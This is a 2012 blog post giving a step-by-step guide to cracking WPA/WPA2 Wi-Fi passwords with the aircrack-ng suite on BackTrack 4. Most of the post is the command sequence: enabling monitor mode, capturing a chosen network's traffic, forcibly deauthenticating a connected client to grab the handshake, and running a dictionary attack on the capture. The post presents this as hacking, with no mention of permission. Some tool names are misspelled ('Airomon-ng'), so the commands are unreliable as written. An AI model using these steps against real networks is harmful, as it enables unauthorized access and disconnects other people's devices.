HomeBlogsschiz0av's blog

how to hack wap/wap2

15 November, 2012 - 11:48 — schiz0av

1. Backtrack 4 life CD/USB or installation;
2. Willing to read all this Smile
The first you can download for free from
here: http://www.backtrack-linux.org/
downloads/.
Username to enter backtrack: root
Password: toor
Type startx and hit ENTER key to fire up
the graphic of BT4.
Web need opened 3 terminals and let's
start:
1. Airomon-ng stop wlan0 (This
command stops the wifi adaptor)
2. Airomon-ng start wlan0 (This
command starts the wifi adaptor in
monitoring mode)
3. Airodump-ng wlan0 (This command is
used only to pick network for test,by
signal strenght, channel, BSSID, ESSID.
The command is stopped with CTRL+C,
we are looking for network WPA or
WPA2)
4. Airodump-ng --channel (Channel
number) --bssid (MAC address of the
network) -w (File name to be saved the
captured information) wlan0 (Leave this
running and open new terminal)
Here is a good idea to mention that there
is two ways to get the key, one to wait for
client AP (access point) handshake or two
to deauthenticate already connected client
and force him to reauthenticate and get
the handshake package. Ok, I will assume
we were lucky and we get the
authentication handshake package then in
the top right part of the console we can
see this "WPA handshake:
00:14:6C:7E:40:80", where
00:14:6C:7E:40:80 is the MAC address of
the access point.
So far so good, but what if we don't get
any authentication handshake package?
Well, we can force the fortune by
deauthenticating already connected client
and make him reauthenticate so we can
get our hanshake package:
5. aireplay-ng -0 1 -a 00:14:6C:7E:40:80
-c 00:0F:B5:FD:FB:C2 wlan0
where -0 is sending deauthentication
command, 1 is the number of
deauthentications to be sent, -a is the
MAC address of the AP, -c is the MAC
address of the client. Important here is to
keep in mind the signal strengh and the
distance between you and the client!
6. aircrack-ng -w password.lst -b
00:14:6C:7E:40:80 *.cap Before running
airckrack-ng command we need to stop
4. by Ctrl+C and keep in mind that *.cap
is the file name that we select for -w
parameter in point 4.
-w password.lst is small dictionary list
that is comming with aircrack-ng, this
dictionary list is optional you can use your
own or download one from internet.
Enjoy!